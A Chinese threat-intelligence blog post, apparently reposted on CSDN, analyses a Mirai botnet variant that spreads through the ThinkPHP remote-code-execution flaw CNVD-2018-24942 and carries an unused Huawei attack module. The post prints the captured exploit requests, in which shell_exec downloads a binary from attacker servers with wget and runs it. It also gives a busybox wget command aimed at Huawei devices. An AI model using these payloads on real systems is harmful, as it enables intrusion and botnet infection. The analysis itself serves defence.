僵尸网络Mirai变种疑似开始针对华为进行武器制作

最新推荐文章于 2023-06-07 07:00:00 发布
最新推荐文章于 2023-06-07 07:00:00 发布
阅读量590 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackorbird/article/details/102462633
版权

640?wx_fmt=png

近日,发现有几个国外IP(77.40.109.35俄罗斯,188.17.77.196俄罗斯,5.140.140.23俄罗斯)对某客户内网多个ip进行了漏洞攻击尝试。通过流量分析确认攻击是是利用CNVD-2018-24942漏洞传播Mirai。此次发现的Mirari变种主要特点为只利用CNVD-2018-24942漏洞传播,且带有启针对华为设备做攻击的字符串,根据分析后推测可能是攻击者没有完工的半成品样本在做测试。

 

通过攻击流量分析,发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码,下图为攻击流量截图:

640?wx_fmt=png

攻击者试发送的payload如下:

‘GET/index.php?s=/index/.hink.pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://107.172.41.235/NoIr_x.86 -O /tmp/NoIr_x.86; chmod 777 /tmp/NoIr_x.86;/tmp/NoIr_x.86 NoIr_x.86' HTTP/1.1..Connection: keep-alive..Accept-Encoding:gzip, deflate..Accept: /..User-Agent: NoIr_x.86/2.0.

 ‘

GET /index.php?s=/index/.hink.pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://85.117.234.116/NoIr_x.86 -O /tmp/NoIr_x.86; chmod 777 /tmp/NoIr_x.86;/tmp/NoIr_x.86 NoIr_x.86' HTTP/1.1..Connection: keep-alive..Accept-Encoding:gzip, deflate..Accept: /..User-Agent: NoIr_x.86/2.0..

 

Payload如果执行成功的话,会下载http://107.172.41.235/NoIr_x.86或http://85.117.234.116/NoIr_x.86到tmp目录并修改lzrd权限为可执行,执行NoIr_x.86'

同时从威胁情报信息查询到http://107.172.41.235上面还存放了arm,mips,mipsl等不同cpu架构版本的病毒,如下图:

640?wx_fmt=png

此病毒最早于5月26日被安全社区发现上传至共享网络。

目前85.117.234.116,107.172.41.235的http服务器都已经关闭,分析团队仅获取到了http://85.117.234.116/NoIr_x.86文件

 

此次的版本有如下特点:

 

1病毒结构非常简单。病毒的传播途径仅通过CNVD-2018-24942thinkphp远程执行漏洞,传播能力十分有限,如下图所示:

640?wx_fmt=png

对比之前发现的mirari变种如下图所示:

640?wx_fmt=png

可以发现以前版本的Mirari病毒往往会有利用弱口令和其他各种利于在快速传播的漏洞攻击模块。如果仅依靠thinkphp漏洞在公网传播,那么感染量将会比较小。

 

2.有未启用的代码模块。继续分析代码发现此病毒还有部分未启动的代码模块,如telnetscan:

640?wx_fmt=png

此模块主要通过弱口令爆破telnet进行内网传播:

640?wx_fmt=png

3.有未启用的针对华为设备的攻击模块:

640?wx_fmt=png

分析后得到此模块大致流程如图:

640?wx_fmt=png

其中对随机IP发送数据包部分,通过调试,得到数据包如下:

640?wx_fmt=png

数据包的构造方式如下:

640?wx_fmt=png

建立连接后,会发送如下命令

640?wx_fmt=png

命令含义为去http://85.117.234.116上下载mips版本的病毒并把huwwei.selfreq(华为.自复制)作为参数执行,此服务器80端口已经关闭

 

 

基于以上三个特点,该变种暂时不具有较强的传播能力,推测可能是攻击者没有完工的半成品样本在做测试,同时攻击者可能会针对华为的设备做专门的攻击,不能确定攻击者是否借助近期的华为事件为目的,不排除攻击者完善代码后会发动新一轮攻击。

 

当然需要补充的是,此前Mirai还会使用华为的CVE-2017-17215进行攻击

640?wx_fmt=png

使用该老漏洞的变种量也是极大

640?wx_fmt=png

样本中利用华为攻击模块的截图

640?wx_fmt=png

640?wx_fmt=png

因此在阅读本文的时候需要和华为的老漏洞进行区分,因为此前并没有使用过如本次变种中涉及华为的代码。

$(/bin/busybox wget -g 85.117.234.116 -l /tmp/NoIr_M.ips -r /NoIr_M.ips

/tmp/NoIr_M.ips huawei.selfrep)

此前checkpoint的分析

https://research.checkpoint.com/good-zero-day-skiddie/

此前的华为漏洞分析可见下文

https://www.freebuf.com/vuls/160040.html

值得一提的是,下面这篇在freebuf发布的文章可以和本文进行关联阅读。

利用Thinkphp漏洞传播的Mirari新变种分析

https://www.freebuf.com/articles/system/194157.html

变种MD5:498aa049cb0a8f5b119c0d2792e6f787

本文作者:来自Tod 安全工作室 K

技术交流请加作者个人微信:kfccfkhg

关于如何破坏Mirai的C2服务器的可以看看下面这篇文章

“ 

640?wx_fmt=png

<上期看点>

黑鸟威胁情报中心,只做最正确的情报,不传谣不信谣,欢迎扫码持续关注。

点击菜单栏,扫码加入每日更新的知识星球原价299,现价269

640?wx_fmt=png

640?wx_fmt=png

blackorbird
关注
Mirai 僵尸网络解释:青少年诈骗者和闭路电视摄像机如何几乎让互联网瘫痪
ZY_Eliza的博客
01-06 1394
Mirai 以一种简单而巧妙的方式利用了不安全的物联网设备。它扫描互联网的大块以寻找开放的 Telnet 端口,然后尝试登录默认密码。通过这种方式,它能够集结僵尸网络军队。 2016 年 10 月 12 日,大规模分布式拒绝服务 (DDoS)攻击导致美国东海岸的大部分互联网无法访问。当局最初担心攻击是敌对民族国家所为,但实际上是 Mirai 僵尸网络所为。 这种攻击最初没有那么宏大的野心——从 Minecraft 爱好者身上赚点钱——变得比它的创造者想象的更强大。这是一个关于意外后果和意外安全威...
Mirai qq机器人框架kotlin/java教程
热门推荐
Eritque arcus的博客
12-28 1万+
Mirai框架qq机器人教程 新版前言资料列表1.准备i. 配置java环境ii. 配置IDEiii. 下载mirai-console-loader(mcl)作为启动器2.创建mirai-console插件项目i. 下载ii. 个性化项目3. 部分文件结构解析4.插件代码解析所以在以下代码中要引入的库i.构建主类ii.覆盖插件启用函数iii.监听事件IV. 全部代码V. gradle部分代码5. 在IDE内运行i. 更改MiraiRunKt配置ii.运行MiraiRunKt任务6. 生成插件并运行i. 生成
Mirai 僵尸网络变体向 RCE、DDoS 开放 Tenda、Zyxel Gear
网络研究观
06-07 1万+
Mirai 僵尸网络的一个变体利用四种不同的设备漏洞将流行的基于 Linux 的服务器和物联网 (IoT) 设备添加到可以进行基于网络的攻击(包括分布式拒绝服务 (DDoS) 攻击)的僵尸网络中。
网络安全学习笔记之Mirai僵尸网络
dzcera的博客
01-28 1万+
最近在学习人工智能防治物联网设备的ddos攻击有关项目时接触到目前主流的IoT攻击模式,其中就包括Mirai僵尸网络。学习了《Understanding the Mirai Botnet》一文,原文链接如下 https://xueshu.baidu.com/usercenter/paper/show?paperid=ef4bd68424819b095fa8837b5fe58049 僵尸网络是互联网上的黑空集中控制一群计算机,是一种大规模的网络攻击方式。包括分布式拒绝服务攻击、海量垃圾邮件攻击等,对网络的安全
什么是Mirai僵尸网络
因上努力,果上随缘。但行好事,莫问前程。
08-08 2307
Mirai是恶意软件,能够感染在ARC处理器上运行的智能设备,将其转变为远程控制的机器人或“僵尸”并组成网络。这种机器人网络称为僵尸网络,通常用于发动DDoS攻击。恶意软件是一个统称,包括计算机蠕虫、病毒、特洛伊木马、Rootkit和间谍软件。2016年9月,Mirai 恶意软件的作者在一个著名安全专家的网站上发起了DDoS攻击。一周后,他们向公众发布了源代码,目的可能是为了隐藏这次攻击的源头。...
linux.mirai:用于ResearchIoC开发目的的泄漏Linux.Mirai源代码
02-04
linux.mirai 泄漏Linux.Mirai研究/ IoC开发目的源代码 上传用于研究目的,因此我们可以开发IoC等。 如果您想知道所有内容的设置方式等信息,请参见“ post.txt”(在中)以了解其泄漏的信息。 小心-那里的垃圾箱可能会与heckforamz滑倒废话。
新的 OpenWrt RCE 漏洞曝光,影响数百万台网络设备
m0_74079109的博客
10-21 1700
随着物联网的不断发展,物联网安全也越来越受到关注。自 2016 年下半年的 Mirai 僵尸网络攻击 事件之后,物联网相关的威胁层出不穷,多个在野漏洞被攻击者所利用,多个僵尸网络相继被研究人员 发现。今年,绿盟科技和国家互联网应急中心(CNCERT)联合发布了物联网安全年报,旨在让大家对 2020 年物联网相关的安全事件、资产、脆弱性和威胁情况有一个全面的认识。报告中的主要内容如下:第一章对 2020 年出现重大的安全事件。
DDos攻击原理
HCIE666CCIE的博客
03-11 4718
DDOS的定义 分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。通常该攻击方式利用目标系统网络服务功能缺陷或者直接消耗其系统资源,使得该目标系统无法提供正常的服务。 攻击的方式 网络层DDos攻击 (1)SYN flood攻击 SYN flood攻击主要利用了TCP三次握手过程中的bug,我们知...
共建可信可管的互联网世界白皮书-华为物联网安全.pdf
07-15
标题《共建可信可管的互联网世界白皮书-华为物联网安全》所涵盖的知识点,从给出的文件内容中可以解读出如下信息: 1. 物联网发展的趋势与市场空间:物联网(IoT)的发展正在为全行业数字化转型提供关键推动力,它...
2023年全球DDoS攻击现状与趋势分析
最新发布
05-29
- **僵尸家族分布**:主要以IoT(物联网)和Linux僵尸网络为主,其中Mirai、Gafgyt、Mozi等僵尸家族占据主导地位。 - **C2地域分布**:僵尸网络的控制中心(Command and Control,简称C2)分布广泛,涉及多个区域,...
Mirai僵尸网络
zheng_zmy的博客
06-15 6055
《Understanding the Mirai Botnet》选择这篇论文是想了解一下物联网设备现如今面临的安全威胁,这篇文章选题是在当时对美国等多个国家的其由于在2016年导致美国大范围网络瘫痪而名噪一时的Mirai僵尸网络,这篇论文对于Mirai僵尸网络进行了完整的分析。但是这是一篇实验记录的文章,主要讲了他们对Mirai的哪些方面做了研究,收集了什么样本,怎么做的实验,得出什么结果,对于想了解Mirai的读者我不怎么友好。因此我结合了一些网上搜集的相关文章来简单介绍一下Mirai以及蜜罐。 僵尸网络
mirai机器人 linux,Mirai机器人搭建步骤
weixin_34261380的博客
05-14 1661
先贴一下资源,回头整理。安装java环境通过MiraiOK安装mirai-console,运行一次后会创建项目目录下载mirai-http-api的jar包放到2中项目里的plugins文件夹下,配置config\MiraiApiHttp\setting.yml文件里的authKey,自己随便填写即可。重启mirai-console,除了最后的报错应该没有红字,如下图mirai-console.p...
病毒分析--mirai物联网病毒
YuZhiHui_No1的专栏
11-01 1万+
物联网僵尸网络病毒“Mirai”在上月参与发起了针对KrebOnSecurity安全站点的大规模分布式DDoS攻击,新一类僵尸网络从各种容易被感染的物联网设备中发起,流量巨大防不胜防。“Mirai”可以高效扫描物联网系统设备,感染采用出厂密码设置或弱密码加密的脆弱物联网设备,被病毒感染后,设备成为僵尸网络机器人后在黑客命令下发动高强度僵尸网络攻击。本文针对Mirai源码进行详细分析。 1. 
网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御
Fortinet_CHINA的博客
12-30 3487
起底Apache Log4j漏洞: 如何出现、如何被利用与如何防御 受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务 受影响用户: 任何使用Log4j的具备该漏洞版本的组织 影响: 远程攻击者控制漏洞系统 漏洞等级: 高危 自12月9日起,一个新型高危漏洞开始在全球肆虐,引起全球互联网用户的广泛关注,此漏洞发现于Apache Log4j框架中,该框架在全球无数服务器中均有部署。该漏洞的官方名称为CVE-2021-44228,俗称“Log4Shell”。 攻击者可直接构造恶意
mirai机器人 linux,GitHub - Nambers/MiraiCP: c++ SDK of Mirai
weixin_39957805的博客
05-14 249
欢迎来到MiraiCP Tips~如有意向一起开发本项目,请联系我邮箱(1930893235@qq.com) ( ̄▽ ̄)"使用声明MiraiCP是一个Mirai 的C++语言的社区SDK,基于Mirai-console和Mirai-core插件模板开发本项目仅供学习参考,禁止用于任何商业用途(根据Mirai的AGPLv3许可协议开源)。本项目不含有任何旨在破坏用户计算机数据和获取用户隐私的恶...
Linux逆向 - Mirai-上
JiangBuLiu的博客
06-04 1082
MiraiMirai变种资料源码Mirai源码[《xd0ol1 - Mirai 源码分析》](https://paper.seebug.org/142/)[《绿盟 - MIRAI源码分析报告》](http://blog.nsfocus.net/mirai-source-analysis-report/)分析报告分析查壳脱壳分析int 80HKiller模块has_exe_access Mirai 虽然Mirai很老了,但是类似学Windows病毒分析拿熊猫烧香练手一样,Linux病毒不逆个Mirai感觉不太
G.O.A.T!最靠谱的Mirai僵尸病毒编译教程
weixin_42652850的博客
03-16 4394
前言 最近在学习Mirai病毒环境的搭建,看了网络上几乎所有的关于Mirai病毒编译的教程,学到了很多,最后也成功把环境搭建起来。我渐渐地发现,对于这个病毒的编译,每个教程都有一点小小的瑕疵,所以单看一个教程是很难成功搭建的。但也正是这些人的分享,我才可以对Mirai病毒有了一定的了解。同时我也想对某些步骤进行一些原理上的解释,于是就有了这篇博客,是一篇堪称保姆级的搭建教程。 “万物之源” 这个病...
如何攻击Mirai僵尸网络(及其变种)的控制服务器?
NOSEC2019的博客
05-07 1072
近期,NewSky Security的首席研究员Ankit Anubhav对外展示了如何利用Mirai僵尸网络源码中的一个微小而简单的漏洞使C2服务器(僵尸网络中的命令和控制服务器)崩溃。 安全专家指出,当有人使用超过1025个“a”字符作为用户名进行连接时,Mirai僵尸网络的C2服务器将会崩溃。 通过分析Github上披露的一部分Mirai僵尸网络代码,安全专家注意到所输入的用户名会被传递...
Anglerfish蜜罐揭示未知恶意软件威胁分析
同时,许多恶意软件,特别是Botnet,已经集成了网络扫描和漏洞利用功能,针对IoT设备和服务器进行分布式扫描和蠕虫式传播。因此,分析这些扫描数据对于了解恶意软件的演变过程至关重要。 Anglerfish蜜罐的特点在于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值